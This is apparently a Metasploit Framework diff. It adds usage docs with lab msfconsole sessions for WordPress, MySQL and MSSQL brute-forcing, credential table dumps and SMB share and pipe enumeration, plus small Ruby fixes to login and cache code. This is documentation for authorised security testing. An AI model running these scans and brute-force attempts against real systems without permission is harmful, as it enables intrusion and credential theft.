[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Running Bruteforce
|
||||||
|
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Skipping all but 1 valid user
|
||||||
|
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Trying username:'admin' with password:''
|
||||||
|
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Failed to login as 'admin'
|
||||||
|
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Trying username:'admin' with password:'root'
|
||||||
|
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Failed to login as 'admin'
|
||||||
|
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Trying username:'admin' with password:'admin'
|
||||||
|
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Failed to login as 'admin'
|
||||||
|
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Trying username:'admin' with password:'god'
|
||||||
|
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Failed to login as 'admin'
|
||||||
|
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - Trying username:'admin' with password:'s3cr3t'
|
||||||
|
[+] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Brute Force - SUCCESSFUL login for 'admin' : 's3cr3t'
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(wordpress_login_enum) >
|
||||||
|
```
|
|
@ -0,0 +1,42 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This (Interesting Data Finder) module will connect to a remote MSSQL server using a given set of credentials and search for rows and columns with “interesting” names. This information can help you fine-tune further attacks against the database.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/mssql/mssql_idf```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/admin/mssql/mssql_idf
|
||||||
|
msf auxiliary(mssql_idf) > set NAMES username|password
|
||||||
|
NAMES => username|password
|
||||||
|
msf auxiliary(mssql_idf) > set PASSWORD password1
|
||||||
|
PASSWORD => password1
|
||||||
|
msf auxiliary(mssql_idf) > set RHOST 192.168.1.195
|
||||||
|
RHOST => 192.168.1.195
|
||||||
|
msf auxiliary(mssql_idf) > run
|
||||||
|
|
||||||
|
|
||||||
|
Database Schema Table Column Data Type Row Count
|
||||||
|
|
||||||
|
======== ====== ============== ===================== ========= ========= ======== ====== ============== ===================== ========= =========
|
||||||
|
|
||||||
|
msdb dbo sysmail_server username nvarchar 0
|
||||||
|
|
||||||
|
msdb dbo backupmediaset is_password_protected bit 0
|
||||||
|
|
||||||
|
msdb dbo backupset is_password_protected bit 0
|
||||||
|
|
||||||
|
logins dbo userpass username varchar 3
|
||||||
|
|
||||||
|
logins dbo userpass password varchar 3
|
||||||
|
|
||||||
|
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(mssql_idf) >
|
||||||
|
```
|
|
@ -0,0 +1,48 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
The `mssql_ping` module queries a host or range of hosts on UDP port 1434 to determine the listening TCP port of any MSSQL server, if available. MSSQL randomizes the TCP port that it listens on so this is a very valuable module in the Framework.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/mssql/mssql_ping```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/mssql/mssql_ping
|
||||||
|
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.200-254
|
||||||
|
RHOSTS => 192.168.1.200-254
|
||||||
|
msf auxiliary(mssql_ping) > set THREADS 20
|
||||||
|
THREADS => 20
|
||||||
|
msf auxiliary(mssql_ping) > run
|
||||||
|
|
||||||
|
[*] Scanned 13 of 55 hosts (023% complete)
|
||||||
|
[*] Scanned 16 of 55 hosts (029% complete)
|
||||||
|
[*] Scanned 17 of 55 hosts (030% complete)
|
||||||
|
[*] SQL Server information for 192.168.1.217:
|
||||||
|
[*] tcp = 27900
|
||||||
|
[*] np = \\SERVER2\pipe\sql\query
|
||||||
|
[*] Version = 8.00.194
|
||||||
|
[*] InstanceName = MSSQLSERVER
|
||||||
|
[*] IsClustered = No
|
||||||
|
[*] ServerName = SERVER2
|
||||||
|
[*] SQL Server information for 192.168.1.241:
|
||||||
|
[*] tcp = 1433
|
||||||
|
[*] np = \\2k3\pipe\sql\query
|
||||||
|
[*] Version = 8.00.194
|
||||||
|
[*] InstanceName = MSSQLSERVER
|
||||||
|
[*] IsClustered = No
|
||||||
|
[*] ServerName = 2k3
|
||||||
|
[*] Scanned 32 of 55 hosts (058% complete)
|
||||||
|
[*] Scanned 40 of 55 hosts (072% complete)
|
||||||
|
[*] Scanned 44 of 55 hosts (080% complete)
|
||||||
|
[*] Scanned 45 of 55 hosts (081% complete)
|
||||||
|
[*] Scanned 46 of 55 hosts (083% complete)
|
||||||
|
[*] Scanned 50 of 55 hosts (090% complete)
|
||||||
|
[*] Scanned 55 of 55 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(mssql_ping) >
|
||||||
|
```
|
|
@ -0,0 +1,38 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module allows you to perform SQL queries against a database using known-good credentials.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/mssql/mssql_sql```
|
||||||
|
2. Do: ```set PASSWORD [password1]```
|
||||||
|
3. Do: ```set RHOSTS [IP]```
|
||||||
|
4. Do: ```set [SQL Command]```
|
||||||
|
5. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/admin/mssql/mssql_sql
|
||||||
|
msf auxiliary(mssql_sql) > set PASSWORD password1
|
||||||
|
PASSWORD => password1
|
||||||
|
msf auxiliary(mssql_sql) > set RHOST 192.168.1.195
|
||||||
|
RHOST => 192.168.1.195
|
||||||
|
msf auxiliary(mssql_sql) > set SQL use logins;select * from userpass
|
||||||
|
SQL => use logins;select * from userpass
|
||||||
|
msf auxiliary(mssql_sql) > run
|
||||||
|
|
||||||
|
[*] SQL Query: use logins;select * from userpass
|
||||||
|
[*] Row Count: 3 (Status: 16 Command: 193)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
userid username password
|
||||||
|
------ -------- --------
|
||||||
|
1 bjohnson password
|
||||||
|
2 aadams s3cr3t
|
||||||
|
3 jsmith htimsj
|
||||||
|
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(mssql_sql) >
|
||||||
|
```
|
|
@ -0,0 +1,63 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This auxiliary module is a brute-force login tool for MySQL servers.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/mysql/mysql_login```
|
||||||
|
2. Do: ```set PASS_FILE [file containing passwords]```
|
||||||
|
3. Do: ```set RHOSTS [IP]```
|
||||||
|
4. Do: ```set USER_FILE [file containing usernames]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/mysql/mysql_login
|
||||||
|
msf auxiliary(mysql_login) > set PASS_FILE /tmp/passes.txt
|
||||||
|
PASS_FILE => /tmp/passes.txt
|
||||||
|
msf auxiliary(mysql_login) > set RHOSTS 192.168.1.200
|
||||||
|
RHOSTS => 192.168.1.200
|
||||||
|
msf auxiliary(mysql_login) > set USER_FILE /tmp/users.txt
|
||||||
|
USER_FILE => /tmp/users.txt
|
||||||
|
msf auxiliary(mysql_login) > run
|
||||||
|
|
||||||
|
[*] 192.168.1.200:3306 - Found remote MySQL version 5.0.51a
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'administrator' with password:''
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'administrator' with password ''
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'admin' with password:''
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'admin' with password ''
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'root' with password:''
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'root' with password ''
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'god' with password:''
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'god' with password ''
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'administrator' with password:'root'
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'administrator' with password 'root'
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'administrator' with password:'admin'
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'administrator' with password 'admin'
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'administrator' with password:'god'
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'administrator' with password 'god'
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'administrator' with password:'s3cr3t'
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'administrator' with password 's3cr3t'
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'admin' with password:'root'
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'admin' with password 'root'
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'admin' with password:'admin'
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'admin' with password 'admin'
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'admin' with password:'god'
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'admin' with password 'god'
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'admin' with password:'s3cr3t'
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'admin' with password 's3cr3t'
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'root' with password:'root'
|
||||||
|
[+] 192.168.1.200:3306 - SUCCESSFUL LOGIN 'root' : 'root'
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'god' with password:'root'
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'god' with password 'root'
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'god' with password:'admin'
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'god' with password 'admin'
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'god' with password:'god'
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'god' with password 'god'
|
||||||
|
[*] 192.168.1.200:3306 Trying username:'god' with password:'s3cr3t'
|
||||||
|
[*] 192.168.1.200:3306 failed to login as 'god' with password 's3cr3t'
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(mysql_login) >
|
||||||
|
```
|
|
@ -0,0 +1,37 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module, as its name implies, scans a host or range of hosts to determine the version of MySQL that is running.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/mysql/mysql_version```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/mysql/mysql_version
|
||||||
|
msf auxiliary(mysql_version) > set RHOSTS 192.168.1.200-254
|
||||||
|
RHOSTS => 192.168.1.200-254
|
||||||
|
msf auxiliary(mysql_version) > set THREADS 20
|
||||||
|
THREADS => 20
|
||||||
|
msf auxiliary(mysql_version) > run
|
||||||
|
|
||||||
|
[*] 192.168.1.200:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
|
||||||
|
[*] 192.168.1.201:3306 is running MySQL, but responds with an error: \x04Host '192.168.1.101' is not allowed to connect to this MySQL server
|
||||||
|
[*] Scanned 21 of 55 hosts (038% complete)
|
||||||
|
[*] 192.168.1.203:3306 is running MySQL, but responds with an error: \x04Host '192.168.1.101' is not allowed to connect to this MySQL server
|
||||||
|
[*] Scanned 22 of 55 hosts (040% complete)
|
||||||
|
[*] Scanned 42 of 55 hosts (076% complete)
|
||||||
|
[*] Scanned 44 of 55 hosts (080% complete)
|
||||||
|
[*] Scanned 45 of 55 hosts (081% complete)
|
||||||
|
[*] Scanned 48 of 55 hosts (087% complete)
|
||||||
|
[*] Scanned 50 of 55 hosts (090% complete)
|
||||||
|
[*] Scanned 51 of 55 hosts (092% complete)
|
||||||
|
[*] Scanned 52 of 55 hosts (094% complete)
|
||||||
|
[*] Scanned 55 of 55 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(mysql_version) >
|
||||||
|
```
|
|
@ -0,0 +1,61 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
The `pipe_auditor` scanner will determine what named pipes are available over SMB. In your information gathering stage, this can provide you with some insight as to some of the services that are running on the remote system.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/smb/pipe_auditor```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/smb/pipe_auditor
|
||||||
|
msf auxiliary(pipe_auditor) > show options
|
||||||
|
|
||||||
|
Module options:
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
RHOSTS yes The target address range or CIDR identifier
|
||||||
|
SMBDomain WORKGROUP no The Windows domain to use for authentication
|
||||||
|
SMBPass no The password for the specified username
|
||||||
|
SMBUser no The username to authenticate as
|
||||||
|
THREADS 1 yes The number of concurrent threads
|
||||||
|
|
||||||
|
msf auxiliary(pipe_auditor) > set RHOSTS 192.168.1.150-160
|
||||||
|
RHOSTS => 192.168.1.150-160
|
||||||
|
msf auxiliary(pipe_auditor) > set THREADS 11
|
||||||
|
THREADS => 11
|
||||||
|
msf auxiliary(pipe_auditor) > run
|
||||||
|
|
||||||
|
[*] 192.168.1.150 - Pipes: \browser
|
||||||
|
[*] 192.168.1.160 - Pipes: \browser
|
||||||
|
[*] Scanned 02 of 11 hosts (018% complete)
|
||||||
|
[*] Scanned 10 of 11 hosts (090% complete)
|
||||||
|
[*] Scanned 11 of 11 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
We can see that running the scanner "###uncredentialed" does not return a great deal of information. If, however, running a "###credentialed", you will find that the pipe_auditor scanner returns a great deal more information.
|
||||||
|
|
||||||
|
```
|
||||||
|
msf auxiliary(pipe_auditor) > set SMBPass s3cr3t
|
||||||
|
SMBPass => s3cr3t
|
||||||
|
msf auxiliary(pipe_auditor) > set SMBUser Administrator
|
||||||
|
SMBUser => Administrator
|
||||||
|
msf auxiliary(pipe_auditor) > run
|
||||||
|
|
||||||
|
[*] 192.168.1.150 - Pipes: \netlogon, \lsarpc, \samr, \browser, \atsvc, \DAV RPC SERVICE, \epmapper, \eventlog, \InitShutdown, \keysvc, \lsass, \ntsvcs, \protected_storage, \scerpc, \srvsvc, \trkwks, \wkssvc
|
||||||
|
[*] Scanned 02 of 11 hosts (018% complete)
|
||||||
|
[*] 192.168.1.160 - Pipes: \netlogon, \lsarpc, \samr, \browser, \atsvc, \DAV RPC SERVICE, \epmapper, \eventlog, \InitShutdown, \keysvc, \lsass, \ntsvcs, \protected_storage, \router, \scerpc, \srvsvc, \trkwks, \wkssvc
|
||||||
|
[*] Scanned 04 of 11 hosts (036% complete)
|
||||||
|
[*] Scanned 08 of 11 hosts (072% complete)
|
||||||
|
[*] Scanned 09 of 11 hosts (081% complete)
|
||||||
|
[*] Scanned 11 of 11 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(pipe_auditor) >
|
||||||
|
```
|
|
@ -0,0 +1,31 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
The `pipe_dcerpc_auditor` scanner will return the DCERPC services that can be accessed via a SMB pipe.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/smb/pipe_dcerpc_auditor```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/smb/pipe_dcerpc_auditor
|
||||||
|
msf auxiliary(pipe_dcerpc_auditor) > set RHOSTS 192.168.1.150-160
|
||||||
|
RHOSTS => 192.168.1.150-160
|
||||||
|
msf auxiliary(pipe_dcerpc_auditor) > set THREADS 11
|
||||||
|
THREADS => 11
|
||||||
|
msf auxiliary(pipe_dcerpc_auditor) > run
|
||||||
|
|
||||||
|
The connection was refused by the remote host (192.168.1.153:139).
|
||||||
|
The connection was refused by the remote host (192.168.1.153:445).
|
||||||
|
192.168.1.160 - UUID 00000131-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
|
||||||
|
192.168.1.150 - UUID 00000131-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
|
||||||
|
192.168.1.160 - UUID 00000134-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
|
||||||
|
192.168.1.150 - UUID 00000134-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
|
||||||
|
192.168.1.150 - UUID 00000143-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
|
||||||
|
192.168.1.160 - UUID 00000143-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
|
||||||
|
...snip...
|
||||||
|
```
|
|
@ -0,0 +1,29 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
The SMB2 scanner module simply scans the remote hosts and determines if they support the SMB2 protocol.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/smb/smb2```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/smb/smb2
|
||||||
|
msf auxiliary(smb2) > set RHOSTS 192.168.1.150-165
|
||||||
|
RHOSTS => 192.168.1.150-165
|
||||||
|
msf auxiliary(smb2) > set THREADS 16
|
||||||
|
THREADS => 16
|
||||||
|
msf auxiliary(smb2) > run
|
||||||
|
|
||||||
|
[*] 192.168.1.162 supports SMB 2 [dialect 255.2] and has been online for 618 hours
|
||||||
|
[*] Scanned 06 of 16 hosts (037% complete)
|
||||||
|
[*] Scanned 13 of 16 hosts (081% complete)
|
||||||
|
[*] Scanned 14 of 16 hosts (087% complete)
|
||||||
|
[*] Scanned 16 of 16 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(smb2) >
|
||||||
|
```
|
|
@ -0,0 +1,63 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
The `smb_enumshares` module, as would be expected, enumerates any SMB shares that are available on a remote system.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/smb/smb_enumshares```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Uncredentialed
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/smb/smb_enumshares
|
||||||
|
msf auxiliary(smb_enumshares) > set RHOSTS 192.168.1.150-165
|
||||||
|
RHOSTS => 192.168.1.150-165
|
||||||
|
msf auxiliary(smb_enumshares) > set THREADS 16
|
||||||
|
THREADS => 16
|
||||||
|
msf auxiliary(smb_enumshares) > run
|
||||||
|
|
||||||
|
[*] 192.168.1.154:139 print$ - Printer Drivers (DISK), tmp - oh noes! (DISK), opt - (DISK), IPC$ - IPC Service (metasploitable server (Samba 3.0.20-Debian)) (IPC), ADMIN$ - IPC Service (metasploitable server (Samba 3.0.20-Debian)) (IPC)
|
||||||
|
Error: 192.168.1.160 Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=37 WordCount=0)
|
||||||
|
Error: 192.168.1.160 Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=37 WordCount=0)
|
||||||
|
[*] 192.168.1.161:139 IPC$ - Remote IPC (IPC), ADMIN$ - Remote Admin (DISK), C$ - Default share (DISK)
|
||||||
|
Error: 192.168.1.162 Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=37 WordCount=0)
|
||||||
|
Error: 192.168.1.150 Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=37 WordCount=0)
|
||||||
|
Error: 192.168.1.150 Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=37 WordCount=0)
|
||||||
|
[*] Scanned 06 of 16 hosts (037% complete)
|
||||||
|
[*] Scanned 09 of 16 hosts (056% complete)
|
||||||
|
[*] Scanned 10 of 16 hosts (062% complete)
|
||||||
|
[*] Scanned 14 of 16 hosts (087% complete)
|
||||||
|
[*] Scanned 15 of 16 hosts (093% complete)
|
||||||
|
[*] Scanned 16 of 16 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(smb_enumshares) >
|
||||||
|
```
|
||||||
|
|
||||||
|
### Credentialed
|
||||||
|
|
||||||
|
As you can see in the previous scan, access is denied to most of the systems that are probed.
|
||||||
|
Doing a Credentialed scan produces much different results.
|
||||||
|
|
||||||
|
```
|
||||||
|
msf auxiliary(smb_enumshares) > set SMBPass s3cr3t
|
||||||
|
SMBPass => s3cr3t
|
||||||
|
msf auxiliary(smb_enumshares) > set SMBUser Administrator
|
||||||
|
SMBUser => Administrator
|
||||||
|
msf auxiliary(smb_enumshares) > run
|
||||||
|
|
||||||
|
[*] 192.168.1.161:139 IPC$ - Remote IPC (IPC), ADMIN$ - Remote Admin (DISK), C$ - Default share (DISK)
|
||||||
|
[*] 192.168.1.160:139 IPC$ - Remote IPC (IPC), ADMIN$ - Remote Admin (DISK), C$ - Default share (DISK)
|
||||||
|
[*] 192.168.1.150:139 IPC$ - Remote IPC (IPC), ADMIN$ - Remote Admin (DISK), C$ - Default share (DISK)
|
||||||
|
[*] Scanned 06 of 16 hosts (037% complete)
|
||||||
|
[*] Scanned 07 of 16 hosts (043% complete)
|
||||||
|
[*] Scanned 12 of 16 hosts (075% complete)
|
||||||
|
[*] Scanned 15 of 16 hosts (093% complete)
|
||||||
|
[*] Scanned 16 of 16 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(smb_enumshares) >
|
||||||
|
```
|
|
@ -118,14 +118,14 @@ module Metasploit
|
||||||
end
|
end
|
||||||
|
|
||||||
case status_code.name
|
case status_code.name
|
||||||
when *StatusCodes::CORRECT_CREDENTIAL_STATUS_CODES
|
when 'STATUS_SUCCESS', 'STATUS_PASSWORD_MUST_CHANGE', 'STATUS_PASSWORD_EXPIRED'
|
||||||
status = Metasploit::Model::Login::Status::DENIED_ACCESS
|
|
||||||
when 'STATUS_SUCCESS'
|
|
||||||
status = Metasploit::Model::Login::Status::SUCCESSFUL
|
status = Metasploit::Model::Login::Status::SUCCESSFUL
|
||||||
when 'STATUS_ACCOUNT_LOCKED_OUT'
|
when 'STATUS_ACCOUNT_LOCKED_OUT'
|
||||||
status = Metasploit::Model::Login::Status::LOCKED_OUT
|
status = Metasploit::Model::Login::Status::LOCKED_OUT
|
||||||
when 'STATUS_LOGON_FAILURE', 'STATUS_ACCESS_DENIED'
|
when 'STATUS_LOGON_FAILURE', 'STATUS_ACCESS_DENIED'
|
||||||
status = Metasploit::Model::Login::Status::INCORRECT
|
status = Metasploit::Model::Login::Status::INCORRECT
|
||||||
|
when *StatusCodes::CORRECT_CREDENTIAL_STATUS_CODES
|
||||||
|
status = Metasploit::Model::Login::Status::DENIED_ACCESS
|
||||||
else
|
else
|
||||||
status = Metasploit::Model::Login::Status::INCORRECT
|
status = Metasploit::Model::Login::Status::INCORRECT
|
||||||
end
|
end
|
||||||
|
|
|
@ -29,15 +29,22 @@ module Msf::Exploit::Remote::Fortinet
|
||||||
password || ''
|
password || ''
|
||||||
))
|
))
|
||||||
|
|
||||||
|
tried = false
|
||||||
|
|
||||||
loop do
|
loop do
|
||||||
message = session.next_message
|
message = session.next_message
|
||||||
|
|
||||||
|
return false unless message
|
||||||
|
|
||||||
case message.type
|
case message.type
|
||||||
when USERAUTH_SUCCESS
|
when USERAUTH_SUCCESS
|
||||||
debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
|
debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
|
||||||
return true
|
return true
|
||||||
when USERAUTH_FAILURE
|
when USERAUTH_FAILURE
|
||||||
debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
|
debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
|
||||||
|
|
||||||
|
break if tried
|
||||||
|
|
||||||
debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' }
|
debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' }
|
||||||
|
|
||||||
send_message(userauth_request(
|
send_message(userauth_request(
|
||||||
|
@ -54,6 +61,8 @@ module Msf::Exploit::Remote::Fortinet
|
||||||
'',
|
'',
|
||||||
''
|
''
|
||||||
))
|
))
|
||||||
|
|
||||||
|
tried = true
|
||||||
when USERAUTH_INFO_REQUEST
|
when USERAUTH_INFO_REQUEST
|
||||||
debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }
|
debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }
|
||||||
|
|
||||||
|
|
|
@ -24,6 +24,7 @@ class Cache
|
||||||
# Refreshes cached module metadata as well as updating the store
|
# Refreshes cached module metadata as well as updating the store
|
||||||
#
|
#
|
||||||
def refresh_metadata_instance(module_instance)
|
def refresh_metadata_instance(module_instance)
|
||||||
|
dlog "Refreshing #{module_instance.refname} of type: #{module_instance.type}"
|
||||||
refresh_metadata_instance_internal(module_instance)
|
refresh_metadata_instance_internal(module_instance)
|
||||||
update_store
|
update_store
|
||||||
end
|
end
|
||||||
|
@ -48,8 +49,22 @@ class Cache
|
||||||
|
|
||||||
mt[1].keys.sort.each do |mn|
|
mt[1].keys.sort.each do |mn|
|
||||||
next if unchanged_reference_name_set.include? mn
|
next if unchanged_reference_name_set.include? mn
|
||||||
module_instance = mt[1].create(mn)
|
|
||||||
next if not module_instance
|
begin
|
||||||
|
module_instance = mt[1].create(mn)
|
||||||
|
rescue Exception => e
|
||||||
|
elog "Unable to create module: #{mn}. #{e.message}"
|
||||||
|
end
|
||||||
|
|
||||||
|
unless module_instance
|
||||||
|
wlog "Removing invalid module reference from cache: #{mn}"
|
||||||
|
existed = remove_from_cache(mn)
|
||||||
|
if existed
|
||||||
|
has_changes = true
|
||||||
|
end
|
||||||
|
next
|
||||||
|
end
|
||||||
|
|
||||||
begin
|
begin
|
||||||
refresh_metadata_instance_internal(module_instance)
|
refresh_metadata_instance_internal(module_instance)
|
||||||
has_changes = true
|
has_changes = true
|
||||||
|
@ -72,7 +87,7 @@ class Cache
|
||||||
|
|
||||||
@module_metadata_cache.each_value do |module_metadata|
|
@module_metadata_cache.each_value do |module_metadata|
|
||||||
|
|
||||||
unless module_metadata.path and ::File.exist?(module_metadata.path)
|
unless module_metadata.path && ::File.exist?(module_metadata.path)
|
||||||
next
|
next
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -91,12 +106,28 @@ class Cache
|
||||||
private
|
private
|
||||||
#######
|
#######
|
||||||
|
|
||||||
|
def remove_from_cache(module_name)
|
||||||
|
old_cache_size = @module_metadata_cache.size
|
||||||
|
@module_metadata_cache.delete_if {|_, module_metadata|
|
||||||
|
module_metadata.ref_name.eql? module_name
|
||||||
|
}
|
||||||
|
|
||||||
|
return old_cache_size != @module_metadata_cache.size
|
||||||
|
end
|
||||||
|
|
||||||
def wait_for_load
|
def wait_for_load
|
||||||
@load_thread.join unless @store_loaded
|
@load_thread.join unless @store_loaded
|
||||||
end
|
end
|
||||||
|
|
||||||
def refresh_metadata_instance_internal(module_instance)
|
def refresh_metadata_instance_internal(module_instance)
|
||||||
metadata_obj = Obj.new(module_instance)
|
metadata_obj = Obj.new(module_instance)
|
||||||
|
|
||||||
|
# Remove all instances of modules pointing to the same path. This prevents stale data hanging
|
||||||
|
# around when modules are incorrectly typed (eg: Auxilary that should be Exploit)
|
||||||
|
@module_metadata_cache.delete_if {|_, module_metadata|
|
||||||
|
module_metadata.path.eql? metadata_obj.path
|
||||||
|
}
|
||||||
|
|
||||||
